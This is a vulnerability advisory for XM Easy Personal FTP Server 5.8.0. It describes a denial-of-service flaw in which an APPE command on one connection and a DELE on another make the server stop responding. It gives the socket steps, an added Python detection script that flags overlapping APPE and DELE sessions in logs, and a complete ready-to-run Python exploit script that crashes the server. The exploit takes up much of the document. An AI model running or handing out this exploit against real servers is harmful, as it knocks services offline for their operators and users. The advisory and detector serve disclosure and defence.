
XM Easy Personal FTP Server 'APPE' and 'DELE' Command Remote Denial of Service Vulnerability






Date of Discovery: 13-Nov-2009

Credits: zhangmc[at]mail.ustc.edu.cn

Vendor: Dxmsoft

Affected:
XM Easy Personal FTP Server 5.8.0
Earlier versions may also be affected

Overview:
XM Easy Personal FTP Server is an easy-to-use FTP server application. A denial-of-service vulnerability exists in XM Personal
FTP Server when the "APPE" command is used in one socket connection while the "DELE" command is used in another.

Details:
If you can log on to the server successfully, taking the following steps makes the FTP server stop responding:

First socket connection:
1. sock.connect((hostname, 21))
2. sock.send("user %s\r\n" %username)
3. sock.send("pass %s\r\n" %passwd)
4. sock.send("PORT 127,0,0,1,122,107\r\n")
5. sock.send("APPE "+ test_string +"\r\n")
6. sock.close()

Second socket connection:
1. sock.connect((hostname, 21))
2. sock.send("user %s\r\n" %username)
3. sock.send("pass %s\r\n" %passwd)
4. sock.send("DELE "+ test_string +"\r\n")
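
Detection sketch for the command sequence above. This is an added example, not part of the original advisory and not code from Dxmsoft. The log line format ("<session> <COMMAND> [argument]"), the session ids, and the CLOSE and TRANSFER_DONE event names are assumptions; adapt the parsing to the command log your FTP server or network sensor actually produces.

```python
# Added defensive example: flag a DELE that targets a path for which another
# session issued APPE and no transfer completion was recorded.
# The log format and the event names are assumptions, not the server's own.

# Constructed sample log, one event per line: "<session> <COMMAND> [argument]".
SAMPLE_LOG = """\
s1 user anonymous
s1 pass anonymous
s1 PORT 127,0,0,1,122,107
s1 APPE a
s1 CLOSE
s2 user anonymous
s2 pass anonymous
s2 DELE a
s3 APPE report.txt
s3 TRANSFER_DONE report.txt
s4 DELE report.txt
"""


def find_appe_dele_overlaps(log_text):
    """Return (path, appe_session, dele_session) for every DELE issued against
    a path that still has an unfinished APPE from a different session."""
    pending = {}  # path -> session whose APPE has not completed
    alerts = []
    for line in log_text.splitlines():
        parts = line.split(None, 2)
        if len(parts) < 2:
            continue  # blank or malformed line
        session = parts[0]
        command = parts[1].upper()  # FTP commands are case-insensitive
        arg = parts[2].strip() if len(parts) == 3 else ""
        if command == "APPE" and arg:
            pending[arg] = session
        elif command == "TRANSFER_DONE" and pending.get(arg) == session:
            del pending[arg]  # append finished normally
        elif command == "DELE" and arg in pending and pending[arg] != session:
            # A closed control connection (CLOSE) deliberately does not clear
            # the pending entry: the advisory's first session closes after APPE.
            alerts.append((arg, pending[arg], session))
    return alerts


if __name__ == "__main__":
    for path, appe_sess, dele_sess in find_appe_dele_overlaps(SAMPLE_LOG):
        print("ALERT: DELE %r in %s while APPE from %s is unfinished"
              % (path, dele_sess, appe_sess))
```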

Severity:
High

Exploit example:

#!/usr/bin/python
import socket
import sys

def Usage():
    print ("Usage:  ./expl.py <hostname> <username> <password>\n")
    print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n")
if len(sys.argv) <> 4:
        Usage()
        sys.exit(1)
else:
    hostname=sys.argv[1]
    username=sys.argv[2]
    passwd=sys.argv[3]
    test_string="a"
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock_data = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 21))
    except:
        print ("Connection error!")
        sys.exit(1)
    r=sock.recv(1024)
    print "[+] "+ r
    sock.send("user %s\r\n" %username)
    print "[-] "+ ("user %s\r\n" %username)
    r=sock.recv(1024)
    print "[+] "+ r
    sock.send("pass %s\r\n" %passwd)
    print "[-] "+ ("pass %s\r\n" %passwd)
    r=sock.recv(1024)
    print "[+] "+ r

    sock_data.bind(('127.0.0.1',31339))
    sock_data.listen(1)
    
    sock.send("PORT 127,0,0,1,122,107\r\n")
    print "[-] "+ ("PORT 127,0,0,1,122,107\r\n")
    r=sock.recv(1024)
    print "[+] "+ r
        
    sock.send("APPE "+ test_string +"\r\n")
    print "[-] "+ ("APPE "+ test_string +"\r\n")
    r=sock.recv(1024)
    print "[+] "+ r
    

     
    sock.close()
    
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 21))
    except:
        print ("Connection error!")
        sys.exit(1)
    r=sock.recv(1024)
    print "[+] "+ r
    sock.send("user %s\r\n" %username)
    print "[-] "+ ("user %s\r\n" %username)
    r=sock.recv(1024)
    print "[+] "+ r
    sock.send("pass %s\r\n" %passwd)
    print "[-] "+ ("pass %s\r\n" %passwd)
    r=sock.recv(1024)
    print "[+] "+ r

    sock.send("DELE "+ test_string +"\r\n")
    print "[-] "+ ("DELE "+ test_string +"\r\n")
    r=sock.recv(1024)
    print "[+] "+ r    
    
    sys.exit(0);




